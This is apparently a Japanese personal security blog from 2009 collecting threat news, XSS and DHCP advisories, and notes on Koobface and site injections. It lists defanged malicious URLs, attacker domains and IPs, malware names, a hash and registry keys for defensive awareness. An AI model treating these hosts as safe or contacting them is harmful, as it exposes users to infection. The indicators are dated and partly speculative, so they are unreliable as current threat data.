Twitterの特許訴訟来たる。TechRadiumが先陣を切って提訴 -- 2009.08.06

Twitterがまたダウン、8月だけで4回目
ダウンネタはもういいかな・・

何かと話題の多いTwitterですが、実際みなさん使ってますか？（笑）

----------
来週ひょっとしたらいなくなるかもしれません。

EoF

大噴火の日・ポンペイ最後の日

ラグビーの日
ラグビーの起源は、「1823年、イングランドの有名なパブリックスクールであるラグビー校でのフットボールの試合中、ウィリアム・ウェッブ・エリス (William Webb Ellis) がボールを抱えたまま相手のゴール目指して走り出した」ことだとされている。
とされてますが、諸説もあるらしいです。

ちなみに、2019年のワールドカップは日本で開催されることが決定しています。

----------
[CAUTION]
最初に報告したのはいつのことだったか忘れましたが
Up to 55k Compromised by Potent Backdoor/Data Theft Cocktail
hXXp://a0v.org/x.jsのインジェクション活動が活発化していると ScanSafeが警告しています。

Googleの検索結果で 53,300となってますが、実際のトコは 236 Uniqueですね（苦笑）
それでも感染が蔓延していることだけは事実ですので注意しましょう。

注意といっても、

という脆弱性攻撃ですので、がいしゅつ（なぜか変換できない）じゃない、既出すぎですね。
ここを見ている方にはあまり関係ないような気もします。
そろそろ Windows2000/XP の窓から投棄を考えないといけない気もしますが・・・

Trojan.Win32.Agent2.chmt, Trojan.Dropper, Mal/Behav-112..
qirueixzz.3322.org
　相変わらず・・・
74.52.164.210 (ThePlanet)
　マタオマエカ
ahthja.info AS4837 (CNC). CNC Group
car741.info AS4837 (CNC). CNC Group
htsrh.info AS4837 (CNC). CNC Group

----------
サイトカレンダ mycaljp におけるクロスサイトスクリプティングの脆弱性

サイトカレンダ mycaljp におけるクロスサイトスクリプティングの脆弱性
サイトカレンダ mycaljp は、オープンソースのコンテンツ管理システムである Geeklog のカレンダープラグインです。サイトカレンダ mycaljp には、クロスサイトスクリプティングの脆弱性が存在します。

mycaljpプラグインにXSSの脆弱性が発見されました
mycaljpプラグインを使用されているサイト管理者の方は速やかにバージョンアップ(Ver.2.0.7)を行ってください。

----------
窓の杜に収録していた「Glary Utilities」および「Glary Undelete」旧バージョンのウイルス感染について
窓の杜では下記のページで告知していますように、ライブラリにソフトを収録する際、「ウイルスバスター2009」「Symantec AntiVirus Corporate Edition」「ESET Smart Security」という3つのセキュリティ対策ソフトでウイルス等をチェックしたのち、収録作業を行っております。

窓の杜 - 窓の杜でのウイルスチェックについて
http://www.forest.impress.co.jp/info/about/viruscheck.html

そのため「Glary Utilities」v2.15.0.728は8月6日に、「Glary Undelete」v1.4.0.211は7月22日に、その時点で最新の定義ファイルを利用してチェックを行いました。しかしながら、この時点では各社ともに最新の定義ファイルでも、“W32.Induc.A”の検出に対応しておりませんでした。

TrendMicro, Symantec, ESETって、よくわからない組み合わせだなぁ・・とか思ったのは内緒です（笑）
VTに１回投げたほうがいいんじゃないでしょうかネ？

----------
Norton 謹製レッテル

Norton先生が危険サイトを「もっともキチャナイ」サイトとしてリストを公表しました（笑）
Dirtiest websites of Summer 2009

有名なものから初見のものまでいろいろありますね

こういう取り組みはいいですね～
SUMMERといわず、毎月やってくれませんか？（笑）

----------
Keep Your Identity Safe
個人情報を盗むマルウェア、Pandaの対策7カ条個人情報盗難の被害に遭うのを防ぐため、同社は以下の対策を奨励している。

1. 銀行や決済サービスを装って個人情報を聞き出そうとするメールに注意する
2. 銀行などのサイトにアクセスする際は、ブラウザにURLを直接入力する
3. クリックした後に不審なURLに切り替わっていないことを確認する
4. サイトのセキュリティ証明書を確認する（通常はブラウザに鍵のマークのアイコンが表示される）
5. コンピュータにセキュリティソフトを導入する
6. 銀行や通販サイトなどで不審を感じたら個人情報を入力しない
7. 銀行や通販などのネットサービスを頻繁に使うユーザーは、詐欺に遭った場合に備えて保険に加入する

こうした、「当たり前のこと」を継続して行えるかどうか？なんですよね。
恐怖を感じる人は、そもそもクレジットカードなんか持っちゃいけません（笑）

----------
相変わらず流出経路不明

［続報］アリコ、顧客情報の流出時期が判明
社内で調査しても埒あかなそう・・

----------
どっちが逆行なのか？

神戸電子専門学校、学生への情報発信に「Twitter」を本格導入

SNSやTwitterの利用、多くの企業で制限/禁止に…理由は「サボるから」

もっとも、その前に「マルウェア感染の危険」というファクターもあるわけですが・・

参考：
Twitter Filter Aimed at Killing Malicious Links

----------

EoF

五山送り火 -- 京都
大文字五山送り火

女子大生の日
1913年（大正2年）、東北帝國大学（現：東北大学）が女子受験生3人の合格を発表。日本に初めて女子大生が誕生した日。そのうちの1人は日本初の女性理学博士となった黒田チカ。

パプアニューギニア 独立記念日

----------
Mass Injection (*repeated*)

Mass Injection of Chinese College Web Sites
昨7月にMSは、MS-OfficeとDirectShowの脆弱性を公表、その攻撃は数千の正規(legitimate)サイトに拡散してしまい、現在も急速な拡大を続けています。中国では全国普通高等学校招生入学考試の後の学生募集期間と相まって、大学のウェブサイトと高等教育機関が攻撃の対象となりました。攻撃者は機密情報を盗んだり、システムをクラッシュさせたりするトロイの木馬を大規模に拡散するために大学のウェブサイトを悪用しています。
Websenseは７月下旬以降、約1000以上のインジェクションを受けている中国の大学と高校のサイトの監視を行っています。現時点でいくつかのサイトは除去されていますが、残ったままのサイトの数は高い水準にあり、それらのサイトでは悪意のJavaスクリプトの再注入が繰り返し発生しています。
以下（ｒｙ

攻撃は主として、

というおなじみのものです。

ただ、
インジェクション　msvidctl.dllの脆弱性を悪用する攻撃2 -- 2009.07.08
に見られるように、単独のスクリプトを複数のファイルに分割し、分割スクリプトも複数のドメインに分割する（非常にタチの悪い）手法が使われるようになり、セキュソフトの単独検知では困難になっているのが実情です。

HIPS的なものが、各PCに必要な時代になってしまっているのかもしれませんね
※Vista/Win7のUACをきちんと理解して運用していれば問題は緩和されますが・・（たぶん）

----------
ViewVC 1.1.2/1.0.9

Subversionのリポジトリビューワ ViewVCにXSS脆弱性がみつかり、最新版がリリースされています。

[UPDATE NOW]
# yum update viewvc ()

ViewVC source code releases
Version 1.0.9 (released 11-Aug-2009)
* security fix: validate the 'view' parameter to avoid XSS attack
* security fix: avoid printing illegal parameter names and values

Version 1.1.2 (released 11-Aug-2009)
* security fix: validate the 'view' parameter to avoid XSS attack
* security fix: avoid printing illegal parameter names and values
* add optional support for character encoding detection (issue #400)
* fix username case handling in svnauthz module (issue #419)
* fix cvsdbadmin/svnadmin rebuild error on missing repos (issue #420)
* don't drop leading blank lines from colorized file contents (issue #422)
* add file.ezt template logic for optionally hiding binary file contents

ViewVC "view" Cross-Site Scripting Vulnerability
指標:2 [Less Critical]

----------
どっちが親亀？

Scribble piggybacks Koobface
豚の背中に乗っていたのは・・・。

先週我々は、koobfaceがおびただしい数のBotを統制してアップデートするメカニズムがあることを発見しました（参考：Twitter-based Botnet Command Channel）。今、あなた（というか感染者）が最新版のトロイをダウンロードしようと試みた場合、既に感染しているほかの誰かのPCから直接取得されます。通常、アップデートは IPアドレスを直接指定して "setup.exe" の形でやってきます。

調査の結果、我々はこれらのファイルのうちかなりの割合で、通常の Koobface だけでは済まない脅威を含んでいることがわかりました。特に我々が発見したのは、Scribble, Virut, Vetor に複合感染しているのを確認しました。我々は以前、これらのファイルが同じ作者によって書かれたものではないか？と言及したことがあります。

結論は？　といいますと、可能性の一つとして、Koobfaceの作者は、より凶悪な存在(most bang)をKoobfaceの背中に乗せることで、一つのダウンロードで複数の感染拡大を狙っている恐れがあります。また別の可能性として、ウィルス感染したファイルがシステムに対してフラグを無効化し、感染拡大を狙っているかもしれません。
（注釈：Scribble(Virux), Virut は高確率で同じ作者のものです。これはポリモルフ型で、ファイルの末尾に潜むWormで、一度感染すると数百のシステムファイルに潜伏、LAN(NetBIOS)経由で感染拡大するため手がつけられません。）

もっとも、個人的にはどちらも真実ではないと思っています。Koobfaceの作者は、監視網を掻い潜って入り込む確率を上昇させるために、そのコードをかなり頻繁に書き換え（亜種を生み出し）てUpdateしていくであろうと予想しています。実際問題、これら（Scribbleなど）のウィルスはかなり古いため、（ウィルスとして）フラグを立てられる可能性が高いと想像します。

想像ですが、これらの（古株）ウィルスは、Bot感染していたPCに既に入り込んでいたものでしょう。それらがトロイのアップデートメカニズムの一部に組み込まれたとき、（旧来の）ウィルスファイルは新しいKoobfaceの実行型ファイル -setup.exe- に向け、とびかかり(pounced) 、まさしくWorm型の旧来のファイルが新しい Koobfaceの棲家を得て拡散の可能性を増大させたのです。



放置Botはもう犯罪の域に入っています。
2009年06月度サイバークリーンセンター活動実績によれば、６月の検出検体は 367,081、ユニークで 19,106。ISPから感染者への注意喚起は 3664人に 8092通が送られたそうです。
複合感染したBotと、MRSAと、どっちがタチが悪いです？（苦笑）

----------
Marc Andreessen

NetScapeの創始者であり、アメリカンドリームの一つの具現化したケースとして有名な マーク・アンドリーセン氏ですが、最近はあまり聞かなかったですね・・・ Ningとか・・？

しかしここへきて、またブラウザを創ると宣言したと NewYorkTimesが伝えています。
Netscape Founder Backs New Browser
Netscapeの生みの親が未来派ブラウザRockMeltの開発に着手–単なるFacebook閲覧用？それとも完全に型破り？

Facebook閲覧用ブラウザ？って何か意味があるのかどうかは謎ですが、どうなるんでしょうね？
それにしてもお姿が・・・

----------
spammer提唱の新(?)・ファイルフォーマット

Spammers Exploring New File Formats

.mht
Internet Explorer 5 の新機能 -- 2004.09.06
[Web アーカイブ、単一のファイル (*.mht) ] 形式
Web ページを [Web アーカイブ、単一のファイル (*.mht) ] 形式で保存すると、Web ページはこの情報を MHTML (Multipurpose Internet Mail Extension) 形式で保存し、ファイルには .mht 拡張子が付けられます。Web ページ内の相対リンクはすべてマップし直され、埋め込みコンテンツは別のフォルダに保存されるのではなく .mht ファイルに含まれます。Web ページ上の絶対参照または絶対ハイパーリンクは変更されません。.mht ファイルは Internet Explorer を使用して表示されます。

.efx
eFax (fax service)
eFax は j2 Global Communicationsが提供する、Faxの送受信のためのデジタルフォーマット

Spammerは、セキュリティソフトやフィルタを掻い潜るために、ありとあらゆる方法を試し、実行に移しています。
その努力を他に向ければ良いのに・・

一方で、米Yahooはこんな取り組みも
米ヤフー、スパム対策としての課金メールシステムを研究

----------
暑いのでこのへんでやめ・・

ヘッダのGnome氏が引退（笑）
代わりに、Dr.Waredac氏が監督します（そんなばかな！？）
BOTRIGHTS (B) WALEDAC 1998-2009 ALL SPAMS HAS BEEN DELIVERED... PROBABLY.

EoF

2009.07.28 TUE

冷蔵庫記念日
ってなってるんですが、由来も、誰が制定したのかも不明・・・
そのうち、DHMO記念日とかできそうだ（苦笑）

----------

今日はイロイロあるので簡単に逝きたいんですが・・ムリかな

----------

さよなら Filemon and Regmon

Filemon and Regmon are dead, long life to Procmon!
The most significant piece of information is that End of Life for Filemon and Regmon is September 1, 2009. Yes, in about one month, two of the most widely used tools for Windows malware analysis and system inspection will say goodbye.
ぇ～！？

The good news is that Procmon (v2.5 at this point) is the natural replacement:

Process Monitor
Process Monitor は、ファイルシステム、レジストリ、プロセスおよびスレッドの活動をリアルタイムで表示する高度な監視ツールです。Process Monitor は Sysinternals のレガシ ユーティリティである 2 つの機能、Filemon と Regmon を組み合わせたものですが、豊富な非破壊フィルタリング、セッション ID、ユーザー名などの情報を含む包括的なイベントプロパティ、信頼性の高いプロセス情報、各操作に対する統合されたシンボル サポートを備えたフル スレッドスタック、ファイルへの同時ログ記録など、多くの機能強化が施されています。独創的で強力な機能を持つ Process Monitor は、システムのトラブルシューティングやマルウェア検出において中核的な役割を果たすツールキットとなるでしょう。

こっちは使ってませんでした（というか Filemonの機能があることを知りませんでした）。
Filemonはずっと使ってたツールですが、お別れを告げることにしましょう。

Updates: Autoruns v9.52, VMMap v2.2, procdump v1.2, procmon v2.5 | Marks Blog: Pushing the Limits of Windows: Processes and Threads

----------

EC-CUBE におけるクロスサイトスクリプティングの脆弱性
EC-CUBE におけるクロスサイトスクリプティングの脆弱性
EC-CUBE における SQL インジェクションの脆弱性
EC-CUBE における SQL インジェクションの脆弱性
EC-CUBE におけるクロスサイトスクリプティングの脆弱性

ロックオンの提供するオープンソースのECサイト構築CMSである EC-CUBE に複数の脆弱性が 2008.11 の時点で報告、既に修正されていますが、今回新たに脆弱性情報への注意喚起が出されました。

脆弱性一覧

EC-CUBE は GPLベースということもあり、小さなECサイト構築に使用されています。

EC-CUBEベースでサイト構築を行っている方は今一度現在のバージョンチェックを行い、適切な処置を行ってください。

また、EC-CUBEベースのサイトでECサイトを構築しているサイトが知人でいらっしゃる方は、注意喚起をしてあげてください。

----------

Hitachi Business Logic Container Unspecified Cross-Site Scripting


Hitachi Business Logic - ContainerおよびHitachi Business Logic - Container 2におけるクロスサイトスクリプティングの脆弱性

関係のある方は（以下略）

----------

Twitter の利用が拡大している（らしい）ですが・・？

Malicious Twitter Posts Get More Personal
Additionally, the spambot uses the URL shortener Doiop.com to mask the original URL in the posts, and for a not so good reason. The URL directs to a URL that triggers a couple of redirections that ultimately lead to the download of the file RegistryEasy.exe

Twitterはその性質上、短縮URLを使用します。
別にそれが悪いわけではありませんが、マルウェアが氾濫している昨今、そうした短縮URLを「何の躊躇も無く」踏ませてしまうシステム自体に大きな問題があることは事実でしょう・・・

とりあえず

短縮URLサービスを変えればいいだけですし、exe はいくらでも改変できるので意味がない対策ですけどね・・・

----------

ラルクの歌詞をエサにして・・・

Relationships 101: Don’t write malware for Girlfriend !!
Today I saw what seems to be another dumb effort by some script kiddie to please his girlfriend.

The author attempts to show off his soft side, by dedicating the Japanese band l’Arc-en-Ciel’s hit song “Honey” to his partner.

どうせならこっちをリンク（笑）


「.exe を踏みつける時点で終わっている」
ということを周知させるのはまだまだ時間がかかりそうです。

----------

ハリーポッター絡みのspamやらscamやら・・

Not Enough Magic by Spammers Using the Potter Tale
Harry Potter ebook.
のようなフレーズでメールが届き・・・


だからなぜそうなる！？

Rumors of Emma Watson's Death Leading to Rogue AV Sites
もう遅いかも（苦笑）

----------

Center for Defense Information Compromised

防衛情報センターCenter for Defense Information
米国の国防系の情報シンクタンクのウェブサイトが、例の OWC 脆弱性攻撃のタグをインジェクションされていた模様

ここを見ている皆さんは既にコレ↓を実行しているでしょうから関係ありませんけどね～
Microsoft Office Web コンポーネント コントロールの脆弱性により、リモートでコードが実行される

----------

H1N1 Shortcut Malware
H1N1ショートカット・マルウェア
　我々は「H1N1」新型インフルエンザをエサにした、新たなマルウェアと遭遇した。
　これはショートカット・ファイルで、.LNKに名称変更されたWindows EXE実行ファイルではなく、実際のリンクファイルだ。

.exeではなく .lnk にもマルクラフト(Mal-Cruft)可能な例

これでまた、注意すべき拡張子が増えましたね

----------

読み物：
アンダーグラウンドの臭いがする「Nine-ball」，アジアに忍び寄る危機
（1）パッチ以外の回避策があるものに関しては設定変更を実施
（2）悪意あるWebサイトのURLが公開されている場合は，ファイアウォールなどのアクセス制御リストを変更
（3）攻撃コードが公開されているのであれば，攻撃トラフィックの特徴的な個所をシグネチャ化してIPS/IDSへ登録

このへんはもう定番ですね
だからこそ、危険URL/ドメイン/IP を出しています。

利用してくれる方が少なくとも２名はいるので（笑）

Gumblar(JSRedir-R)の目的がはっきりしないのは事実ですが、1und1の例なんかを見ると Gumblarによって窃取されたFTP credentialsが取引されているのでは？という指摘もあります。

----------

Adobe 'zero-day' flaw is eight months old

Adobeの今回の脆弱性は８ヶ月前に指摘されていた！？
というお話

ZDnet/Cnetの話は、１歩引いてみる癖がついていますが・・・

----------

DHCPに迫る危険



・・・・・
CVE-2009-0692

DHCP Stack Overflow in 'dhclient' script_write_params()
Upgrade to 4.1.0p1, 4.0.1p1, or 3.1.2p1
There are no fixes planned for DHCP 3.0 or DHCP 2.0, as those release trains have reached End-Of-Life.

----------

あー多かった・・

EoF

Google Blocked ! （苦笑）
www.stemcellproject.mext.go.jp の診断ページ
疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
さすが Google 先生、容赦ありません（笑）

再生医療の実現化プロジェクトのWeb改ざんについて
　文部科学省は、内閣官房情報セキュリティセンターより、平成21年7月26日日曜日、文部科学省の「再生医療の実現化プロジェクト」のWebが一部改ざんされているとの連絡を受けました。文部科学省では、直ちに、同Webの管理・運営を委託している（財団法人）先端医療振興財団にサーバーの停止を指示しました。詳細については確認中ですが、現在の状況は以下のとおりです。

文科省のサイトが改ざん　中国サイト？にリンク
中国のサイト？ってなってますけど、 .cn だからって中国だと決め付けるのは .to ドメインの人はみんなトンガの人って決めるのと同じだとおもいます（笑）

delzzerro.cn	BLOCKED	delzzerro.cn	3887
updatedate.cn	BLOCKED	updatedate.cn	6152
91.212.198.37	AS49314	NEVAL(Hosting company LIR.KZ)

NEVAL Russian Federation
となっていますが、TraceRouteしてみると直前のGatewayが
213.182.206.26 JUNIK Latvia
なのでお察しください・・・って感じですかね？（笑）

--
他の DELZZERRO 感染サイトから最終的にインストールされる（と思われる）トロイ本体の挙動
Report MD5:e41e16d0ec09d694caab8f0350add417

チェックすべき場所：レジストリ：
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Run
Name = braviax
Name = sysldtray
に不審な exe が登録されていないかどうか
(注) nameは変動する可能性が高いです

もし、不幸にもトロイがインストールされてしまうと、キーロガー的な挙動を行うと思われています。
別の亜種の挙動：
Mal/EncPk-JB, TrojanDownloader:Win32/Harnig.gen!P, Hoax.Win32.Renos.vchc..

mcsmc.org	THROUGH	mcsmc.org	NOT YET
micronetsys.org	THROUGH	micronetsys.org	NOT YET
chkwl.com	BLOCKED	chkwl.com	73
dnscustomsite.info	THROUGH	dnscustomsite.info	NOT YET
dvdserv.com	THROUGH	dvdserv.com	7
forummoda.net	THROUGH	forummoda.net	NOT YET
94.75.207.170	AS16265	LeaseWeb
はい・・おなじみ LeaseWebです（笑）
mnprfix.cn	THROUGH	mnprfix.cn	NOT YET
eventmng.cn	THROUGH	eventmng.cn	NOT YET
118.126.7.223	AS4837	China Network Communications
bureltanovaderta.com	BLOCKED	bureltanovaderta.com	47
1024service.com	THROUGH	1024service.com	NOT YET
66.79.178.200	AS27645	Managed Solutions Group, Inc.

installb.exe0 received 2009.07.25 02:33:29 (UTC)
現時点ではもうちょっとは検出率上がってるとは思いますが・・・